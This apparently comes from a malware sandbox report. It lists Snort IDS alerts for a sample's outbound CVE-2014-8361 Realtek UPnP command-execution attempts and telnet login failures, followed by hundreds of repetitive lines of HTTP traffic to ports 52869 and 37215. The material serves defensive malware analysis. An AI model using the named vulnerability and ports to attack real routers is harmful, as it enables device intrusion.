    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44336 -> 91.78.148.148:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43110 -> 185.131.78.113:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43110 -> 185.131.78.113:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51312 -> 185.131.76.204:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51312 -> 185.131.76.204:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44340 -> 91.78.148.148:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43158 -> 185.131.78.113:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51360 -> 185.131.76.204:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 89.137.238.249:23 -> 192.168.2.23:50336
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 89.137.238.249:23 -> 192.168.2.23:50336
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50262 -> 45.84.88.145:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50262 -> 45.84.88.145:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58340 -> 45.158.21.200:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58340 -> 45.158.21.200:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50268 -> 45.84.88.145:52869
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 41.110.216.95:23 -> 192.168.2.23:43322
    Source: TrafficSnort IDS: 716 INFO TELNET access 211.129.155.129:23 -> 192.168.2.23:54758
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 97.64.252.73:23 -> 192.168.2.23:59446
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 97.64.252.73:23 -> 192.168.2.23:59446
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 68.65.150.5:23 -> 192.168.2.23:56968
    Uses known network protocols on non-standard portsShow sources
    Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60692 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60698 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 60692
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 60698
    Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55222 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41092 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55228 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41098 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45572 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46890 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46894 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56232 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43654 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47734 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35552 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35558 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44326 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43668 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47754 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54224 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56232 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54094 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43654 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44326 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38512 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43668 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54224 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38520 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47734 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53448 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47754 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35538 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56232 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44326 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43654 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54224 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43668 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35538 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53448 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47734 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47754 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35538 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53448 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44326 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56232 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43654 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54224 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43668 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54094 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38354 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 47734 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49568 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47754 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35538 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36744 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35158 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40162 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38354 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 55942 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58316 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54210 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55954 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49568 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54224 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55942 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55954 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55942 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53448 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55954 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58316 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49568 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38354 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35158 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41258 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 32934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43220 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 32942 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43228 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 43220
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 32934
    Source: unknownNetwork traffic detected: HTTP traffic on port 41252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 43228
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 32942
    Source: unknownNetwork traffic detected: HTTP traffic on port 40162 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41258 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55942 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55954 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41258 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58316 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58284 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44326 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54224 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35158 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56232 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41258 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43654 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43668 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40162 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42822 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38354 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 49568 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37166 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55942 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42822 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55954 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35538 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42822 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54094 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58316 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39030 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39980 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37166 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41258 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47734 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45918 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42822 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47754 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39980 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35158 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35898 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42372 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42376 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43508 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44562 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53406 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39980 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53442 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37166 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33742 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53448 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42822 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40162 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53442 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47780 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47784 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34458 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55954 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55942 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33742 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49568 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39980 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38354 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 39030 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34458 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53442 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41258 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34042 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35398 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58316 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57902 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34048 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57912 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52422 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37992 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 52422
    Source: unknownNetwork traffic detected: HTTP traffic on port 38942 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38022 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33742 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37166 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34458 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55744 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53916 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55750 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53406 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37992 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39740 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38022 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39740 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44326 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53442 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42822 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54094 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54224 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52782 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52784 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37992 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38022 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60902 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35158 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52830 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39980 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34458 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39740 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56232 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55886 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33742 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43654 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35538 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52830 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45084 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45092 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50642 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43668 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50642 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55886 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52830 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39740 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34434 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38022 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39172 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39192 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60534 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 39030 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37992 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44898 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50642 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40162 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55886 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54094 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34434 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34486 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60902 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55942 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55954 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53554 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 51514 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53442 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52830 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53406 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37166 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50642 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34458 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41258 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47298 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47140 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34486 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55142 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47156 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 47140
    Source: unknownNetwork traffic detected: HTTP traffic on port 49568 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47734 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53478 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53484 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34434 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55886 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47754 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 47156
    Source: unknownNetwork traffic detected: HTTP traffic on port 47298 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38354 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 55142 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39740 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58316 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34486 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47298 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41254 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55142 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46150 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60486 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57426 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48426 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54094 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46160 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38016 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33742 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42822 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38022 -> 52869
